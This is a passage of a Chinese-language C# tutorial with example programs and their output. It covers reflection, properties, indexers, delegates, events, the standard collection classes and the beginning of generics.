    Message = "Return type mismatch")]
    public double GetArea()
    {
    return length * width;
    }
    [DeBugInfo(56, "Zara Ali", "19/10/2012")]
    public void Display()
    {
    Console.WriteLine("Length: {0}", length);
    Console.WriteLine("Width: {0}", width);
    Console.WriteLine("Area: {0}", GetArea());
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle(5, 8);
    r.Display();
    }
    }
    Length: 5
    Width: 8
    Area: 40

    C# 反射(Reflection)

    ​反射指程序可以访问、检测和修改它本身状态或行为的一种能力。

    ​程序集包含模块,而模块包含类型,类型又包含成员。反射则提供了封装程序集、模块和类型的对象。

    ​您可以使用反射动态地创建类型的实例,将类型绑定到现有对象,或从现有对象中获取类型。然后,可以调用类型的方法或访问其字段和属性。

    优缺点

    优点:

    • 1、反射提高了程序的灵活性和扩展性。
    • 2、降低耦合性,提高自适应能力。
    • 3、它允许程序创建和控制任何类的对象,无需提前硬编码目标类。

    缺点:

• 1、性能问题:反射基本上是一种解释操作,访问字段和方法时要远慢于直接代码。因此反射机制主要应用在对灵活性和拓展性要求很高的系统框架上,普通程序不建议使用。
• 2、反射会模糊程序的内部逻辑:程序员希望在源代码中直接看到程序的逻辑,反射却绕过了源代码,因而会带来维护问题,反射代码也比相应的直接代码更复杂。

    反射(Reflection)的用途

    ​反射(Reflection)有下列用途:

    • 它允许在运行时查看特性(attribute)信息。
    • 它允许审查集合中的各种类型,以及实例化这些类型。
    • 它允许延迟绑定的方法和属性(property)。
    • 它允许在运行时创建新类型,然后使用这些类型执行一些任务。
    using System;

    [AttributeUsage(AttributeTargets.All)]
    public class HelpAttribute : System.Attribute
    {
    public readonly string Url;

    public string Topic // Topic 是一个命名(named)参数
    {
    get
    {
    return topic;
    }
    set
    {

    topic = value;
    }
    }

    public HelpAttribute(string url) // url 是一个定位(positional)参数
    {
    this.Url = url;
    }

    public override string ToString()
    {
    return base.ToString() + ": "+ this.Url;
    }

    private string topic;
    }
    [HelpAttribute("Information on the class MyClass")]
    class MyClass
    {
    }

    namespace AttributeAppl
    {
    class Program
    {
    static void Main(string[] args)
    {
    System.Reflection.MemberInfo info = typeof(MyClass);
    object[] attributes = info.GetCustomAttributes(true);
    for (int i = 0; i < attributes.Length; i++)
    {
    System.Console.WriteLine(attributes[i]);
    }
    Console.ReadKey();

    }
    }
    }
    HelpAttribute: Information on the class MyClass
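
​结合前面“特性”一节的例子,也可以用反射在运行时枚举 Rectangle 类上的 DeBugInfo 特性。下面是一个示意,假设 DeBugInfo 与 Rectangle 的定义和前文一致:

    using System;

    class AttributeReader
    {
        static void Main()
        {
            // 假设 DeBugInfo 特性与 Rectangle 类的定义同前文
            Type type = typeof(Rectangle);

            // 遍历类级别的所有自定义特性
            foreach (object attr in type.GetCustomAttributes(false))
            {
                DeBugInfo dbi = attr as DeBugInfo;
                if (dbi != null)
                {
                    Console.WriteLine("Bug no: {0}, Developer: {1}, Last reviewed: {2}, Remarks: {3}",
                        dbi.BugNo, dbi.Developer, dbi.LastReview, dbi.Message);
                }
            }
        }
    }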

    C# 属性(Property)

属性(Property) 是类(class)、结构(structure)和接口(interface)的命名(named)成员。类或结构中的成员变量称为 域(Field)。属性(Property)是域(Field)的扩展,且可使用相同的语法来访问。它们使用 访问器(accessors) 让私有域的值可被读写或操作。

    ​属性(Property)不会确定存储位置。相反,它们具有可读写或计算它们值的 访问器(accessors)

    ​例如,有一个名为 Student 的类,带有 age、name 和 code 的私有域。我们不能在类的范围以外直接访问这些域,但是我们可以拥有访问这些私有域的属性

    访问器(Accessors)

    ​属性(Property)的访问器(accessor)包含有助于获取(读取或计算)或设置(写入)属性的可执行语句。访问器(accessor)声明可包含一个 get 访问器一个 set 访问器,或者同时包含二者。例如:

    using System;
    namespace runoob
    {
    class Student
    {

    private string code = "N.A";
    private string name = "not known";
    private int age = 0;

    // 声明类型为 string 的 Code 属性
    public string Code
    {
    get
    {
    return code;
    }
    set
    {
    code = value;
    }
    }

    // 声明类型为 string 的 Name 属性
    public string Name
    {
    get
    {
    return name;
    }
    set
    {
    name = value;
    }
    }

    // 声明类型为 int 的 Age 属性
    public int Age
    {
    get
    {
    return age;
    }
    set
    {
    age = value;
    }
    }
    public override string ToString()
    {
    return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
    }
    }
    class ExampleDemo
    {
    public static void Main()
    {
    // 创建一个新的 Student 对象
    Student s = new Student();

    // 设置 student 的 code、name 和 age
    s.Code = "001";
    s.Name = "Zara";
    s.Age = 9;
    Console.WriteLine("Student Info: {0}", s);
    // 增加年龄
    s.Age += 1;
    Console.WriteLine("Student Info: {0}", s);
    Console.ReadKey();
    }
    }
    }
    Student Info: Code = 001, Name = Zara, Age = 9
    Student Info: Code = 001, Name = Zara, Age = 10

​在这段代码中,将 code、name 和 age 设为私有字段,并通过公共属性 Code、Name 和 Age 进行访问的做法,比直接将它们设为公共字段(public fields)有几个优势:

1. 封装性和安全性: 使用属性可以提供更好的封装性,隐藏了实现细节(私有字段 code、name、age),并且可以在属性的 getter 和 setter 方法中添加额外的逻辑。例如,可以在 setter 中验证输入值的有效性或执行特定的逻辑。
    2. 易于修改和扩展: 如果将字段直接暴露为公共字段,在修改字段名称、类型或者添加验证逻辑时,会影响到所有访问该字段的代码。而使用属性,可以在不影响其他代码的情况下修改属性的实现。
    3. 数据绑定和事件处理: 使用属性使得数据绑定更加容易。一些 GUI 应用程序框架(如 WPF、WinForms)能够自动绑定属性到用户界面元素,这样可以通过属性实现数据的显示和输入验证。此外,属性的 setter 可以触发事件,通知其他对象数据的变化。
    4. 符合面向对象的设计原则: 封装是面向对象编程的核心原则之一,它提供了更好的抽象和封装,使得代码更加模块化、可维护和可测试。

    ​虽然直接使用公共字段也可以达到相同的效果,但这种做法在实际开发中可能会带来更多的问题,例如难以控制访问权限、不利于后续的代码修改和维护等。因此,使用属性来访问私有字段是一种更好的实践,它能够提高代码的可靠性和灵活性。
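
​顺带一提,当 getter/setter 中没有额外逻辑时,C# 3.0 起可以使用“自动实现属性”,由编译器生成隐藏的私有字段(C# 6.0 起还支持属性初始化器)。下面是把上面的 Student 用自动属性改写的示意:

    using System;

    class Student
    {
        // 自动实现属性:无需手动声明私有字段
        public string Code { get; set; } = "N.A";
        public string Name { get; set; } = "not known";
        public int Age { get; set; }

        public override string ToString()
        {
            return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
        }
    }

    class Demo
    {
        static void Main()
        {
            Student s = new Student { Code = "001", Name = "Zara", Age = 9 };
            Console.WriteLine(s);
        }
    }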

    抽象属性(Abstract Properties)

    ​抽象类可拥有抽象属性,这些属性应在派生类中被实现。下面的程序说明了这点:

    using System;
    namespace runoob
    {
    public abstract class Person
    {
    public abstract string Name
    {
    get;
    set;
    }
    public abstract int Age
    {
    get;
    set;
    }
    }
    class Student : Person
    {

    private string code = "N.A";
    private string name = "N.A";
    private int age = 0;

    // 声明类型为 string 的 Code 属性
    public string Code
    {
    get
    {
    return code;
    }
    set
    {
    code = value;
    }
    }

    // 声明类型为 string 的 Name 属性
    public override string Name
    {
    get
    {
    return name;
    }
    set
    {
    name = value;
    }
    }

    // 声明类型为 int 的 Age 属性
    public override int Age
    {
    get
    {
    return age;
    }
    set
    {
    age = value;
    }
    }
    public override string ToString()
    {
    return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
    }
    }
    class ExampleDemo
    {
    public static void Main()
    {
    // 创建一个新的 Student 对象
    Student s = new Student();

    // 设置 student 的 code、name 和 age
    s.Code = "001";
    s.Name = "Zara";
    s.Age = 9;
    Console.WriteLine("Student Info:- {0}", s);
    // 增加年龄
    s.Age += 1;
    Console.WriteLine("Student Info:- {0}", s);
    Console.ReadKey();
    }
    }
    }
    Student Info:- Code = 001, Name = Zara, Age = 9
    Student Info:- Code = 001, Name = Zara, Age = 10

    C# 索引器(Indexer)

    索引器(Indexer) 允许一个对象可以像数组一样使用下标的方式来访问。

    ​当您为类定义一个索引器时,该类的行为就会像一个 虚拟数组(virtual array) 一样。您可以使用数组访问运算符 [ ] 来访问该类的的成员。

    索引器(Indexer)的用途

    ​索引器的行为的声明在某种程度上类似于属性(property)。就像属性(property),您可使用 getset 访问器来定义索引器。但是,属性返回或设置一个特定的数据成员,而索引器返回或设置对象实例的一个特定值。换句话说,它把实例数据分为更小的部分,并索引每个部分,获取或设置每个部分。

    ​定义一个属性(property)包括提供属性名称。索引器定义的时候不带有名称,但带有 this 关键字,它指向对象实例。下面的实例演示了这个概念:

    using System;
    namespace IndexerApplication
    {
    class IndexedNames
    {
    private string[] namelist = new string[size];
    static public int size = 10;
    public IndexedNames()
    {
    for (int i = 0; i < size; i++)
    namelist[i] = "N. A.";
    }
    public string this[int index]
    {
    get
    {
    string tmp;

    if (index >= 0 && index <= size - 1)
    {
    tmp = namelist[index];
    }
    else
    {
    tmp = "";
    }

    return (tmp);
    }
    set
    {
    if (index >= 0 && index <= size - 1)
    {
    namelist[index] = value;
    }
    }
    }

    static void Main(string[] args)
    {
    IndexedNames names = new IndexedNames();
    names[0] = "Zara";
    names[1] = "Riz";
    names[2] = "Nuha";
    names[3] = "Asif";
    names[4] = "Davinder";
    names[5] = "Sunil";
    names[6] = "Rubic";
    for (int i = 0; i < IndexedNames.size; i++)
    {
    Console.WriteLine(names[i]);
    }
    Console.ReadKey();
    }
    }
    }
    Zara
    Riz
    Nuha
    Asif
    Davinder
    Sunil
    Rubic
    N. A.
    N. A.
    N. A.

    重载索引器(Indexer)

​索引器(Indexer)可被重载。索引器声明的时候也可带有多个参数,且每个参数可以是不同的类型。索引器的参数也不一定是整型的:C# 允许索引器使用其他类型的参数,例如字符串类型。

    ​下面的实例演示了重载索引器:

    using System;
    namespace IndexerApplication
    {
    class IndexedNames
    {
    private string[] namelist = new string[size];
    static public int size = 10;
    public IndexedNames()
    {
    for (int i = 0; i < size; i++)
    {
    namelist[i] = "N. A.";
    }
    }
    public string this[int index]
    {
    get
    {
    string tmp;

    if (index >= 0 && index <= size - 1)
    {
    tmp = namelist[index];
    }
    else
    {
    tmp = "";
    }

    return (tmp);
    }
    set
    {
    if (index >= 0 && index <= size - 1)
    {
    namelist[index] = value;
    }
    }
    }
    public int this[string name]
    {
    get
    {
    int index = 0;
    while (index < size)
    {
    if (namelist[index] == name)
    {
    return index;
    }
    index++;
    }
    return index;
    }

    }

    static void Main(string[] args)
    {
    IndexedNames names = new IndexedNames();
    names[0] = "Zara";
    names[1] = "Riz";
    names[2] = "Nuha";
    names[3] = "Asif";
    names[4] = "Davinder";
    names[5] = "Sunil";
    names[6] = "Rubic";
    // 使用带有 int 参数的第一个索引器
    for (int i = 0; i < IndexedNames.size; i++)
    {
    Console.WriteLine(names[i]);
    }
    // 使用带有 string 参数的第二个索引器
    Console.WriteLine(names["Nuha"]);
    Console.ReadKey();
    }
    }
    }
    Zara
    Riz
    Nuha
    Asif
    Davinder
    Sunil
    Rubic
    N. A.
    N. A.
    N. A.
    2

    C# 委托(Delegate)

​C# 中的委托(Delegate)类似于 C 或 C++ 中的函数指针。委托(Delegate) 是存有对某个方法的引用的一种引用类型变量,引用可在运行时被改变。

    ​委托(Delegate)特别用于实现事件和回调方法。所有的委托(Delegate)都派生自 System.Delegate 类。

    实例化委托(Delegate)

    using System;

    delegate int NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger nc1 = new NumberChanger(AddNum);
    NumberChanger nc2 = new NumberChanger(MultNum);
    // 使用委托对象调用方法
nc1(25); // num = 10 + 25 = 35
Console.WriteLine("Value of Num: {0}", getNum());
nc2(5); // num = 35 * 5 = 175
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    Value of Num: 35
    Value of Num: 175

    委托的多播(Multicasting of a Delegate)

    ​委托对象可使用 “+” 运算符进行合并。一个合并委托调用它所合并的两个委托。只有相同类型的委托可被合并。“-” 运算符可用于从合并的委托中移除组件委托。

    ​使用委托的这个有用的特点,您可以创建一个委托被调用时要调用的方法的调用列表。这被称为委托的 多播(multicasting),也叫组播。下面的程序演示了委托的多播:

    using System;

    delegate int NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger nc;
    NumberChanger nc1 = new NumberChanger(AddNum);
    NumberChanger nc2 = new NumberChanger(MultNum);
    nc = nc1;
    nc += nc2;
    // 调用多播
    nc(5); // (10 + 5) * 5 = 75
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    Value of Num: 75

    委托(Delegate)的用途

​下面的实例演示了委托的用法。委托 printString 可用于引用任何接受一个字符串输入、且不返回任何值的方法。

    ​我们使用这个委托来调用两个方法(将函数变成一个参数),第一个把字符串打印到控制台,第二个把字符串打印到文件:

    using System;
    using System.IO;

    namespace DelegateAppl
    {
    class PrintString
    {
    static FileStream fs;
    static StreamWriter sw;
    // 委托声明
    public delegate void printString(string s);

    // 该方法打印到控制台
    public static void WriteToScreen(string str)
    {
    Console.WriteLine("The String is: {0}", str);
    }
    // 该方法打印到文件
    public static void WriteToFile(string s)
    {
    fs = new FileStream("c:\\message.txt", FileMode.Append, FileAccess.Write);
    sw = new StreamWriter(fs);
    sw.WriteLine(s);
    sw.Flush();
    sw.Close();
    fs.Close();
    }
    // 该方法把委托作为参数,并使用它调用方法
    public static void sendString(printString ps)
    {
    ps("Hello World");
    }
    static void Main(string[] args)
    {
    printString ps1 = new printString(WriteToScreen);
    printString ps2 = new printString(WriteToFile);
    sendString(ps1);
    sendString(ps2);
    Console.ReadKey();
    }
    }
    }

    C# 事件(Event)

事件(Event) 基本上说是一个用户操作,如按键、点击、鼠标移动等等,或者是一些提示信息,如系统生成的通知(例如中断)。应用程序需要在事件发生时响应事件。

​在 C# 中,事件机制常被用来在应用程序的不同组成部分之间传递消息,例如 UI 框架中控件与业务逻辑之间的交互。

    通过事件使用委托

    ​事件在类中声明且生成,且通过使用同一个类或其他类中的委托与事件处理程序关联。包含事件的类用于发布事件。这被称为 发布器(publisher) 类。其他接受该事件的类被称为 订阅器(subscriber) 类。事件使用 发布-订阅(publisher-subscriber) 模型。

    发布器(publisher) 是一个包含事件和委托定义的对象。事件和委托之间的联系也定义在这个对象中。发布器(publisher)类的对象调用这个事件,并通知其他的对象。

    订阅器(subscriber) 是一个接受事件并提供事件处理程序的对象。在发布器(publisher)类中的委托调用订阅器(subscriber)类中的方法(事件处理程序)。

    声明事件(Event)

    ​在类的内部声明事件,首先必须声明该事件的委托类型。例如:

    public delegate void BoilerLogHandler(string status);

    ​然后,声明事件本身,使用 event 关键字:

    // 基于上面的委托定义事件
    public event BoilerLogHandler BoilerEventLog;

    示例

    using System;
    namespace SimpleEvent
    {
    using System;
    /***********发布器类***********/
    public class EventTest
    {
    private int value;

    public delegate void NumManipulationHandler();

    public event NumManipulationHandler ChangeNum;

    protected virtual void OnNumChanged() // 为了允许子类(如果有的话)重写这个方法
    {
    if (ChangeNum != null)
    {
    ChangeNum(); /* 事件被触发,派发事件 ChangeNum */
    }
    else
    {
    Console.WriteLine("event not fire");
    Console.ReadKey(); /* 回车继续 */
    }
    }


    public EventTest() // 构造函数
    {
    int n = 5;
    SetValue(n);
    }


    public void SetValue(int n)
    {
    if (value != n) // 如果数据更新:
    {
    value = n;
    OnNumChanged();
    }
    }
    }


    /***********订阅器类***********/

    public class subscribEvent
    {
    public void printf()
    {
    Console.WriteLine("event fire");
    Console.ReadKey(); /* 回车继续 */
    }
    }

    /***********触发***********/
    public class MainClass
    {
    public static void Main()
    {
    EventTest e = new EventTest(); /* 实例化对象,构造函数将执行一次 OnNumChanged(),第一次没有触发事件 */
    subscribEvent v = new subscribEvent(); /* 实例化对象 */
    e.ChangeNum += new EventTest.NumManipulationHandler(v.printf); /* 注册:接收到消息时,执行函数:printf() */
    e.SetValue(7);
    e.SetValue(11);
    e.SetValue(11);
    e.SetValue(9);
    }
    }
    }
    event not fire
    event fire
    event fire
    event fire
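
​实际开发中更常见的做法,是使用 .NET 标准的 EventHandler / EventHandler&lt;TEventArgs&gt; 委托签名(发送者 + 事件参数)来声明事件。下面是按该约定改写的一个小示意(Counter 为假设的示例名):

    using System;

    public class Counter
    {
        private int value;

        // 使用标准的 EventHandler 签名声明事件
        public event EventHandler ValueChanged;

        public void SetValue(int n)
        {
            if (value != n)
            {
                value = n;
                // ?.Invoke 在没有订阅者时安全地跳过(C# 6+ 写法)
                ValueChanged?.Invoke(this, EventArgs.Empty);
            }
        }
    }

    class Demo
    {
        static void Main()
        {
            Counter c = new Counter();
            c.ValueChanged += (sender, e) => Console.WriteLine("value changed");
            c.SetValue(7);  // 值变化,触发事件
            c.SetValue(7);  // 值未变,不触发
        }
    }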

    C# 集合(Collection)

    ​集合(Collection)类是专门用于数据存储和检索的类。这些类提供了对:

    • 栈(stack)
    • 队列(queue)
    • 列表(list)
    • 哈希表(hash table)

    的支持。大多数集合类实现了相同的接口。

    List

    using System;
    using static System.Console;
    using System.Collections.Generic;
    namespace HelloWorldApplication
    {
    class HelloWorld
    {
    static void Main(string[] args)
    {
    var a = new List<int>();
    a.Add(2);
    a.Add(6);
    a.Add(2);
    a.Add(10);
    Console.WriteLine($"第一个数为{a[0]}");
    a.Remove(2);//删去第一个匹配此条件的项
    a.Sort();
    foreach (var a2 in a)
    {
    WriteLine(a2);
    }
    bool a3 = a.Contains(2);
    WriteLine(a3);
    Console.ReadKey();
    }
    }
    }
    第一个数为2
    2
    6
    10
    True

    动态数组(ArrayList)

    ​在 C# 中,List<T>ArrayList 都是用来存储集合数据的类,但它们在实现和使用上有一些重要的区别:

    1. 类型安全性
  • List:List<T> 是泛型类,其中的 <T> 表示可以存储的元素类型。这意味着在创建 List<T> 实例时,你必须指定存储在列表中的元素类型。例如,List<int> 表示只能存储整数类型的列表,List<string> 表示只能存储字符串类型的列表。由于是泛型类,编译器可以在编译时执行类型检查,确保在编写代码时就能捕获到类型不匹配的错误。
  • ArrayList:ArrayList 是非泛型类,可以存储任意类型的对象。在 ArrayList 中,存储的是 object 类型的元素,因此可以存储任何类型的对象。但这也带来了一个问题,即当你从 ArrayList 中取出元素时,需要进行显式的类型转换,这可能导致运行时类型转换错误。
    2. 性能
      • List 通常比 ArrayList 性能更好,因为它避免了装箱和拆箱的开销。装箱是将值类型转换为对象类型,而拆箱是将对象类型转换为值类型。由于 List<T> 是泛型的,可以直接存储值类型,因此避免了这些额外的操作。
      • ArrayList 存储的是 object 类型,因此当你从 ArrayList 中取出元素时,需要进行类型转换(拆箱),这会引入性能损失。
    3. 扩展性
      • List 支持 LINQ 查询,因为它是泛型的,可以与 LINQ 方法无缝集成,提供了丰富的集合操作功能。
      • ArrayList 由于存储的是 object 类型,无法直接与 LINQ 方法一起使用,需要在使用时进行显式的类型转换。

    ​基于以上区别,推荐在大多数情况下优先选择 List<T>,因为它提供了类型安全、性能更好以及更好的扩展性。只有在需要与遗留代码或者需要存储不同类型对象的情况下,才考虑使用 ArrayList

    using System;
    using System.Collections;

    namespace CollectionApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    ArrayList al = new ArrayList();

    Console.WriteLine("Adding some objects:");
    al.Add(45);
    al.Add("A");
    al.Add(33);
    al.Add(56);
    al.Add(true);
    al.Add(23);
    al.Add(9);

    Console.WriteLine("Capacity: {0} ", al.Capacity);
    Console.WriteLine("Count: {0}", al.Count);

    Console.Write("Content: ");
    foreach (var i in al)
    {
    Console.Write(i + " ");
    }
    Console.WriteLine();
    Console.ReadKey();
    }
    }
    }
    Adding some objects:
    Capacity: 8
    Count: 7
    Content: 45 A 33 56 True 23 9

    哈希表(Hashtable)

​Hashtable 类代表了一系列基于键的哈希代码组织起来的键/值对,它使用键来访问集合中的元素。

​当您需要使用键来访问元素、并且可以确定一个有意义的键值时,就可以使用哈希表。哈希表中的每一项都有一个键/值对,键用于访问集合中的项目。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Hashtable ht = new Hashtable();


    ht.Add("001", "Zara Ali");
    ht.Add("002", "Abida Rehman");
    ht.Add("003", "Joe Holzner");
    ht.Add("004", "Mausam Benazir Nur");
    ht.Add("005", "M. Amlan");
    ht.Add("006", "M. Arif");
    ht.Add("007", "Ritesh Saikia");

    if (ht.ContainsValue("Nuha Ali"))
    {
    Console.WriteLine("This student name is already in the list");
    }
    else
    {
    ht.Add("008", "Nuha Ali");
    }
    // 获取键的集合
    ICollection key = ht.Keys;

    foreach (string k in key)
    {
    Console.WriteLine(k + ": " + ht[k]);
    }
    Console.ReadKey();
    }
    }
    }
    006: M. Arif
    007: Ritesh Saikia
    008: Nuha Ali
    003: Joe Holzner
    002: Abida Rehman
    004: Mausam Benazir Nur
    001: Zara Ali
    005: M. Amlan

    字典

    ​在 C# 中,哈希表(HashTable)和字典(Dictionary)是两种不同的数据结构,它们具有以下区别:

    1. 实现方式
  • 哈希表(HashTable):System.Collections.Hashtable 是在早期版本的 .NET 中提供的,它实现了一个散列表,使用哈希函数来存储和访问键值对。它支持通过哈希码进行快速的插入、删除和查找操作。哈希表中的键和值可以是任意对象,但要求键不为 null。
  • 字典(Dictionary):System.Collections.Generic.Dictionary<TKey, TValue> 是泛型类型,在 .NET Framework 2.0 及以后的版本中引入。字典也是基于哈希表的实现,但它是类型安全的,允许指定键(Key)和值(Value)的类型。这使得字典在类型检查和类型安全性方面比哈希表更优越。
    2. 类型安全性
      • 哈希表:由于哈希表存储的是object类型,所以在检索值时需要进行显式的类型转换,这可能导致运行时类型错误或异常。
      • 字典:字典使用泛型参数 <TKey, TValue> 定义键和值的类型,因此编译器能够在编译时捕获类型错误,提供更安全的操作。
    3. 性能
      • 在大多数情况下,字典的性能会优于哈希表,因为字典的实现允许更高效的内部优化,而且由于泛型类型的引入,它可以更准确地利用内存和处理器的优化特性。

    ​综上所述,尽管哈希表和字典在功能上有所重叠(即存储键值对的能力),但字典在C#中通常是更好的选择,特别是在需要类型安全、更好性能和更清晰的编码方面。

    using System;
    using System.Collections.Generic;
    namespace HelloWorldApplication
    {
    class A
    {
    static void Main(string[] args)
    {
    var a = new Dictionary<int, int>();
    a.Add(12, 14);
    a.Add(0, 1);
    Console.WriteLine("删去前的Count" + a.Count);
    a.Remove(0);
    Console.WriteLine(a[12]);
    Console.WriteLine(a.Count);
    Console.WriteLine(a.ContainsKey(12));
    Console.ReadKey();
    }
    }
    }
    删去前的Count2
    14
    1
    True
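
​需要注意,用 a[key] 访问不存在的键会抛出 KeyNotFoundException;更稳妥的做法是使用 TryGetValue 或 ContainsKey,示意如下:

    using System;
    using System.Collections.Generic;

    class Demo
    {
        static void Main()
        {
            var a = new Dictionary<int, int> { { 12, 14 } };

            // TryGetValue:键存在时返回 true,并通过 out 参数取回对应的值
            int v;
            if (a.TryGetValue(12, out v))
                Console.WriteLine(v); // 14

            if (!a.TryGetValue(0, out v))
                Console.WriteLine("键 0 不存在"); // 不会抛异常
        }
    }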

    排序列表(SortedList)

    ​SortedList 类代表了一系列按照键来排序的键/值对,这些键值对可以通过键和索引来访问。

    ​排序列表是数组和哈希表的组合。它包含一个可使用键或索引访问各项的列表。如果您使用索引访问各项,则它是一个动态数组(ArrayList),如果您使用键访问各项,则它是一个哈希表(Hashtable)。集合中的各项总是按键值排序。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    SortedList sl = new SortedList();

    sl.Add("003", "Joe Holzner");
    sl.Add("001", "Zara Ali");
    sl.Add("004", "Mausam Benazir Nur");
    sl.Add("002", "Abida Rehman");
    sl.Add("107", "Ritesh Saikia");
    sl.Add("006", "M. Arif");
    sl.Add("00A", "M. Amlan");

    if (sl.ContainsValue("Nuha Ali"))
    {
    Console.WriteLine("This student name is already in the list");
    }
    else
    {
    sl.Add("008", "Nuha Ali");
    }

    // 获取键的集合
    ICollection key = sl.Keys;

    foreach (string k in key)
    {
    Console.WriteLine(k + ": " + sl[k]);
    }
    }
    }
    }
    001: Zara Ali
    002: Abida Rehman
    003: Joe Holzner
    004: Mausam Benazir Nur
    006: M. Arif
    008: Nuha Ali
    00A: M. Amlan
    107: Ritesh Saikia

    堆栈(Stack)

    堆栈(Stack)代表了一个后进先出的对象集合。当您需要对各项进行后进先出的访问时,则使用堆栈。当您在列表中添加一项,称为推入元素,当您从列表中移除一项时,称为弹出元素。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Stack st = new Stack();

    st.Push('A');
    st.Push('M');
    st.Push('G');
    st.Push('W');

    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    Console.WriteLine();

    st.Push('V');
    st.Push('H');
    Console.WriteLine("The next poppable value in stack: {0}",
    st.Peek());
    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    Console.WriteLine();

    Console.WriteLine("Removing values ");
    st.Pop();
    st.Pop();
    st.Pop();

    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    }
    }
    }
    Current stack:
    W G M A
    The next poppable value in stack: H
    Current stack:
    H V W G M A
    Removing values
    Current stack:
    G M A

    队列(Queue)

​队列(Queue)代表了一个先进先出的对象集合。当您需要对各项进行先进先出的访问时,则使用队列。当您在列表中添加一项,称为入队,当您从列表中移除一项时,称为出队。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Queue q = new Queue();

    q.Enqueue('A');
    q.Enqueue('M');
    q.Enqueue('G');
    q.Enqueue('W');

    Console.WriteLine("Current queue: ");
    foreach (char c in q)
    Console.Write(c + " ");
    Console.WriteLine();
    q.Enqueue('V');
    q.Enqueue('H');
    Console.WriteLine("Current queue: ");
    foreach (char c in q)
    Console.Write(c + " ");
    Console.WriteLine();
    Console.WriteLine("Removing some values ");
    char ch = (char)q.Dequeue();
    Console.WriteLine("The removed value: {0}", ch);
    ch = (char)q.Dequeue();
    Console.WriteLine("The removed value: {0}", ch);
    Console.ReadKey();
    }
    }
    }
    Current queue:
    A M G W
    Current queue:
    A M G W V H
    Removing some values
    The removed value: A
    The removed value: M
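
​与 ArrayList / List&lt;T&gt; 的关系类似,System.Collections.Generic 命名空间也提供了泛型的 Stack&lt;T&gt; 和 Queue&lt;T&gt;,类型安全且避免装箱,实际开发中更推荐使用。下面是一个小示意:

    using System;
    using System.Collections.Generic;

    class Demo
    {
        static void Main()
        {
            var st = new Stack<char>();
            st.Push('A');
            st.Push('M');
            Console.WriteLine(st.Pop());    // M(后进先出)

            var q = new Queue<char>();
            q.Enqueue('A');
            q.Enqueue('M');
            Console.WriteLine(q.Dequeue()); // A(先进先出)
        }
    }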

    点阵列(BitArray)

    ​BitArray 类管理一个紧凑型的位值数组,它使用布尔值来表示,其中 true 表示位是开启的(1),false 表示位是关闭的(0)。

    ​当您需要存储位,但是事先不知道位数时,则使用点阵列。您可以使用整型索引从点阵列集合中访问各项,索引从零开始。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 创建两个大小为 8 的点阵列
    BitArray ba1 = new BitArray(8);
    BitArray ba2 = new BitArray(8);
    byte[] a = { 60 };
    byte[] b = { 13 };

    // 把值 60 和 13 存储到点阵列中
    ba1 = new BitArray(a);
    ba2 = new BitArray(b);

    // ba1 的内容
    Console.WriteLine("Bit array ba1: 60");
    for (int i = 0; i < ba1.Count; i++)
    {
    Console.Write("{0, -6} ", ba1[i]);
    }
    Console.WriteLine();

    // ba2 的内容
    Console.WriteLine("Bit array ba2: 13");
    for (int i = 0; i < ba2.Count; i++)
    {
    Console.Write("{0, -6} ", ba2[i]);
    }
    Console.WriteLine();


    BitArray ba3 = new BitArray(8);
    ba3 = ba1.And(ba2);

    // ba3 的内容
    Console.WriteLine("Bit array ba3 after AND operation: 12");
    for (int i = 0; i < ba3.Count; i++)
    {
    Console.Write("{0, -6} ", ba3[i]);
    }
    Console.WriteLine();

// 注意:And() 会就地修改 ba1 并返回该实例,执行完上面的 AND 之后 ba1 已变为 12
ba3 = ba1.Or(ba2); // 12 | 13 = 13
// ba3 的内容
Console.WriteLine("Bit array ba3 after OR operation: 13");
    for (int i = 0; i < ba3.Count; i++)
    {
    Console.Write("{0, -6} ", ba3[i]);
    }
    Console.WriteLine();

    Console.ReadKey();
    }
    }
    }
    Bit array ba1: 60
    False False True True True True False False
    Bit array ba2: 13
    True False True True False False False False
    Bit array ba3 after AND operation: 12
    False False True True False False False False
Bit array ba3 after OR operation: 13
    True False True True False False False False

    ​感觉就是把一个数的二进制形式拆成 bool 形式来表示。

    泛型(Generic)

    泛型(Generic) 允许您延迟编写类或方法中的编程元素的数据类型的规范,直到实际在程序中使用它的时候。换句话说,泛型允许您编写一个可以与任何数据类型一起工作的类或方法。

    ​您可以通过数据类型的替代参数编写类或方法的规范。当编译器遇到类的构造函数或方法的函数调用时,它会生成代码来处理指定的数据类型。

    ​您可以通过类型参数定义泛型委托。例如:

    using System;
    using System.Collections.Generic;

    delegate T NumberChanger<T>(T n);
    namespace GenericDelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
